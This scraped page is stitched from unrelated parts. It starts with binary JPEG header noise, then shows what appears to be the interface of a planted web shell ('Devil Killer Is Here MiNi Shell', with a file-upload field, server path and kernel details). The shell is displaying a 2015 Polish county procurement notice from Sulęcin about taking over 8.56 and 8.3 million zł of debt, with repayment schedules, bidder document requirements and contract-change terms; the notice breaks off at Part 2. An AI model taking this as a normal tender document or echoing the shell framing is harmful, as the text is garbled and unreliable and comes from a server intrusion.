JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151104/297040-N-2015.html

<p class="kh_header"><b>Sulęcin: Sfinansowanie zobowiązań Powiatu poprzez przejęcie długu w kwotach 8 560 000,00 zł oraz 8 300 000,00 zł (art. 518 § 1 pkt 3 Kodeksu cywilnego)</b><br>
<b>Numer ogłoszenia: 297040 - 2015; data zamieszczenia: 04.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Sulęciński , ul. Lipowa 18a, 69-200 Sulęcin, woj. lubuskie, tel. 095 7555243 do 46, faks 095 7555557.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sfinansowanie zobowiązań Powiatu poprzez przejęcie długu w kwotach 8 560 000,00 zł oraz 8 300 000,00 zł (art. 518 § 1 pkt 3 Kodeksu cywilnego).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa: sfinansowanie zobowiązań Powiatu poprzez przejęcie długu w kwotach 8 560 000,00 zł (słownie: osiem milionów pięćset sześćdziesiąt tysięcy złotych, 00/100) oraz 8 300 000,00 zł (słownie: osiem milionów trzysta tysięcy złotych, 00/100) (art. 518 § 1 pkt 3 Kodeksu cywilnego).
Zamówienie zostało podzielone na dwa zadania: 
Zadanie nr 1: Przedmiotem zamówienia jest usługa sfinansowania zobowiązań Powiatu poprzez przejęcie długu w kwocie 8 560 000,00 zł (słownie: osiem milionów pięćset sześćdziesiąt tysięcy złotych, 00/100) (art. 518 § 1 pkt 3 Kodeksu cywilnego). Spłata przejętego zobowiązania nastąpi w 60 kwartalnych ratach płatnych w terminie od 31 marca 2016 r. do 31 grudnia 2030 r. zgodnie z poniższym harmonogramem (w przypadku zmniejszenia kwoty przejętych wierzytelności harmonogram zostanie dopasowany poprzez pomniejszenie kolejnych rat, począwszy od ostatniej):
L.P.	DATA	Kwota [zł]
1	31.03.2016	5 000,00
2	30.06.2016	5 000,00
3	30.09.2016	5 000,00
4	31.12.2016	5 000,00
5	31.03.2017	5 000,00
6	30.06.2017	5 000,00
7	30.09.2017	5 000,00
8	31.12.2017	5 000,00
9	31.03.2018	50 000,00
10	30.06.2018	50 000,00
11	30.09.2018	50 000,00
12	31.12.2018	50 000,00
13	31.03.2019	50 000,00
14	30.06.2019	50 000,00
15	30.09.2019	50 000,00
16	31.12.2019	50 000,00
17	31.03.2020	90 000,00
18	30.06.2020	90 000,00
19	30.09.2020	90 000,00
20	31.12.2020	90 000,00
21	31.03.2021	140 000,00
22	30.06.2021	140 000,00
23	30.09.2021	140 000,00
24	31.12.2021	140 000,00
25	31.03.2022	140 000,00
26	30.06.2022	140 000,00
27	30.09.2022	140 000,00
28	31.12.2022	140 000,00
29	31.03.2023	145 000,00
30	30.06.2023	145 000,00
31	30.09.2023	145 000,00
32	31.12.2023	145 000,00
33	31.03.2024	180 000,00
34	30.06.2024	180 000,00
35	30.09.2024	180 000,00
36	31.12.2024	180 000,00
37	31.03.2025	180 000,00
38	30.06.2025	180 000,00
39	30.09.2025	180 000,00
40	31.12.2025	180 000,00
41	31.03.2026	180 000,00
42	30.06.2026	180 000,00
43	30.09.2026	180 000,00
44	31.12.2026	180 000,00
45	31.03.2027	210 000,00
46	30.06.2027	210 000,00
47	30.09.2027	210 000,00
48	31.12.2027	210 000,00
49	31.03.2028	240 000,00
50	30.06.2028	240 000,00
51	30.09.2028	240 000,00
52	31.12.2028	240 000,00
53	31.03.2029	250 000,00
54	30.06.2029	250 000,00
55	30.09.2029	250 000,00
56	31.12.2029	250 000,00
57	31.03.2030	275 000,00
58	30.06.2030	275 000,00
59	30.09.2030	275 000,00
60	31.12.2030	275 000,00

Zadanie nr 2: Przedmiotem zamówienia jest usługa sfinansowania zobowiązań Powiatu poprzez przejęcie długu w kwocie 8 300 000,00 zł (słownie: osiem milionów trzysta tysięcy złotych, 00/100) (art. 518 § 1 pkt 3 Kodeksu cywilnego). Spłata przejętego zobowiązania nastąpi w 52 kwartalnych ratach płatnych w terminie od 31 marca 2018 r. do 31 grudnia 2030 r. zgodnie z poniższym harmonogramem (w przypadku zmniejszenia kwoty przejętych wierzytelności harmonogram zostanie dopasowany poprzez pomniejszenie kolejnych rat, począwszy od ostatniej):
L.P.	DATA	Kwota [zł]
1	31.03.2018	30 000,00
2	30.06.2018	30 000,00
3	30.09.2018	30 000,00
4	31.12.2018	30 000,00
5	31.03.2019	45 000,00
6	30.06.2019	45 000,00
7	30.09.2019	45 000,00
8	31.12.2019	45 000,00
9	31.03.2020	75 000,00
10	30.06.2020	75 000,00
11	30.09.2020	75 000,00
12	31.12.2020	75 000,00
13	31.03.2021	87 500,00
14	30.06.2021	87 500,00
15	30.09.2021	87 500,00
16	31.12.2021	87 500,00
17	31.03.2022	125 000,00
18	30.06.2022	125 000,00
19	30.09.2022	125 000,00
20	31.12.2022	125 000,00
21	31.03.2023	162 500,00
22	30.06.2023	162 500,00
23	30.09.2023	162 500,00
24	31.12.2023	162 500,00
25	31.03.2024	175 000,00
26	30.06.2024	175 000,00
27	30.09.2024	175 000,00
28	31.12.2024	175 000,00
29	31.03.2025	200 000,00
30	30.06.2025	200 000,00
31	30.09.2025	200 000,00
32	31.12.2025	200 000,00
33	31.03.2026	225 000,00
34	30.06.2026	225 000,00
35	30.09.2026	225 000,00
36	31.12.2026	225 000,00
37	31.03.2027	225 000,00
38	30.06.2027	225 000,00
39	30.09.2027	225 000,00
40	31.12.2027	225 000,00
41	31.03.2028	225 000,00
42	30.06.2028	225 000,00
43	30.09.2028	225 000,00
44	31.12.2028	225 000,00
45	31.03.2029	250 000,00
46	30.06.2029	250 000,00
47	30.09.2029	250 000,00
48	31.12.2029	250 000,00
49	31.03.2030	250 000,00
50	30.06.2030	250 000,00
51	30.09.2030	250 000,00
52	31.12.2030	250 000,00.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2030.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium:
Dla Zadania nr 1 w wysokości 30 000,00 zł (słownie: trzydzieści tysięcy złotych, 00/100). Wadium, wniesione w każdej formie, musi obejmować okres związania ofertą, to jest 60 dni od ostatecznego terminu składania ofert,
Dla Zadania nr 2 w wysokości 30 000,00 zł (słownie: trzydzieści tysięcy złotych, 00/100). Wadium, wniesione w każdej formie, musi obejmować okres związania ofertą, to jest 60 dni od ostatecznego terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy dla Zadania nr 1
2. Formularz ofertowy dla Zadania nr 2</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Możliwość wydłużenia okresu spłaty zobowiązania maksymalnie o kolejne 3 lata - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy (w formie aneksu) w stosunku do treści oferty zgodnie z art. 144 ust. 1 ustawy Pzp:
1)	Możliwość wcześniejszej spłaty zobowiązania - bez pobierania dodatkowych opłat z tego tytułu, poza kosztami przedstawionymi w ofercie Wykonawcy. Zamawiający dopuszcza zmianę terminu zakończenia wykonania zamówienia. W przypadku wcześniejszej spłaty zobowiązania Zamawiający poinformuje Wykonawcę w terminie 7 dni przed planowaną spłatą.
2)	Możliwość zmian w harmonogramie spłat w poszczególnych latach - w okresie spłaty zobowiązania - bez pobierania dodatkowych opłat z tego tytułu, poza kosztami przedstawionymi w ofercie Wykonawcy.
3)	Możliwość przesunięcia terminu spłacenia wierzytelności Zamawiającego z dnia 31 grudnia 2015 r. na późniejszy - w przypadku niemożliwości zawarcia umowy spowodowanej przedłużającą się procedurą przetargową. W takim przypadku kwota finansowania może również ulec zmniejszeniu.
4)	Możliwość wydłużenia okresu spłaty zobowiązania maksymalnie o kolejne 3 lata (tj. o 12 kolejnych rat kwartalnych), wraz ze zmianą harmonogramu spłaty w formie aneksu do Umowy, bez pobierania dodatkowych opłat z tego tytułu, poza kosztami przedstawionymi w ofercie Wykonawcy.
W przypadku wydłużenia spłaty zobowiązania o maksymalnie 3 lata (tj. 12 rat):
a.	Zamawiający w terminie 30 dni przed planowaną płatnością rat poinformuje Wykonawcę o zamiarze skorzystania z możliwości wydłużenia okresu spłaty poprzez oświadczenie w formie pisemnej,
b.	pozostała do zapłaty część kapitału będzie płatna w równych ratach (z zastrzeżeniem, że ostatnia rata będzie ratą wyrównującą) na koniec każdego kwartału,
c.	w wydłużonym okresie spłaty (12 rat) Wykonawcy przysługiwać będzie wynagrodzenie w postaci odsetek naliczanych od pozostałego do spłaty kapitału,
d.	w wydłużonym okresie spłaty (12 rat) odsetki płatne będą na koniec każdego kwartału. 
Postanowienia niniejszego punktu nie znajdują zastosowania do Wykonawcy, który na etapie zgłaszania ofert nie dopuścił możliwości wydłużenia Zamawiającemu okresu spłaty zobowiązania wraz ze zmianą harmonogramu spłaty, chyba że w okresie późniejszym strony zawarły w tym zakresie zgodne porozumienie w formie pisemnej aneksu do Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiatsulecinski.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Sulęcinie, ul. Lipowa 16, 69-200 Sulęcin pok. 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 10:00, miejsce: Biuro Podawcze Starostwa Powiatowego w Sulęcinie, pok. nr 112, ul. Lipowa 18a, 69-200 Sulęcin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sfinansowanie zobowiązań Powiatu poprzez przejęcie długu w kwocie 8 560 000,00 zł (art. 518 § 1 pkt 3 Kodeksu cywilnego).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1: Przedmiotem zamówienia jest usługa sfinansowania zobowiązań Powiatu poprzez przejęcie długu w kwocie 8 560 000,00 zł (słownie: osiem milionów pięćset sześćdziesiąt tysięcy złotych, 00/100) (art. 518 § 1 pkt 3 Kodeksu cywilnego). Spłata przejętego zobowiązania nastąpi w 60 kwartalnych ratach płatnych w terminie od 31 marca 2016 r. do 31 grudnia 2030 r. zgodnie z poniższym harmonogramem (w przypadku zmniejszenia kwoty przejętych wierzytelności harmonogram zostanie dopasowany poprzez pomniejszenie kolejnych rat, począwszy od ostatniej):
L.P.	DATA	Kwota [zł]
1	31.03.2016	5 000,00
2	30.06.2016	5 000,00
3	30.09.2016	5 000,00
4	31.12.2016	5 000,00
5	31.03.2017	5 000,00
6	30.06.2017	5 000,00
7	30.09.2017	5 000,00
8	31.12.2017	5 000,00
9	31.03.2018	50 000,00
10	30.06.2018	50 000,00
11	30.09.2018	50 000,00
12	31.12.2018	50 000,00
13	31.03.2019	50 000,00
14	30.06.2019	50 000,00
15	30.09.2019	50 000,00
16	31.12.2019	50 000,00
17	31.03.2020	90 000,00
18	30.06.2020	90 000,00
19	30.09.2020	90 000,00
20	31.12.2020	90 000,00
21	31.03.2021	140 000,00
22	30.06.2021	140 000,00
23	30.09.2021	140 000,00
24	31.12.2021	140 000,00
25	31.03.2022	140 000,00
26	30.06.2022	140 000,00
27	30.09.2022	140 000,00
28	31.12.2022	140 000,00
29	31.03.2023	145 000,00
30	30.06.2023	145 000,00
31	30.09.2023	145 000,00
32	31.12.2023	145 000,00
33	31.03.2024	180 000,00
34	30.06.2024	180 000,00
35	30.09.2024	180 000,00
36	31.12.2024	180 000,00
37	31.03.2025	180 000,00
38	30.06.2025	180 000,00
39	30.09.2025	180 000,00
40	31.12.2025	180 000,00
41	31.03.2026	180 000,00
42	30.06.2026	180 000,00
43	30.09.2026	180 000,00
44	31.12.2026	180 000,00
45	31.03.2027	210 000,00
46	30.06.2027	210 000,00
47	30.09.2027	210 000,00
48	31.12.2027	210 000,00
49	31.03.2028	240 000,00
50	30.06.2028	240 000,00
51	30.09.2028	240 000,00
52	31.12.2028	240 000,00
53	31.03.2029	250 000,00
54	30.06.2029	250 000,00
55	30.09.2029	250 000,00
56	31.12.2029	250 000,00
57	31.03.2030	275 000,00
58	30.06.2030	275 000,00
59	30.09.2030	275 000,00
60	31.12.2030	275 000,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2030.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Możliwość wydłużenia okresu spłaty zobowiązania maksymalnie o kolejne 3 lata - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sfinansowanie zobowiązań Powiatu poprzez przejęcie długu w kwocie 8 300 000,00 zł (art. 518 § 1 pkt 3 Kodeksu cywilnego).</p>
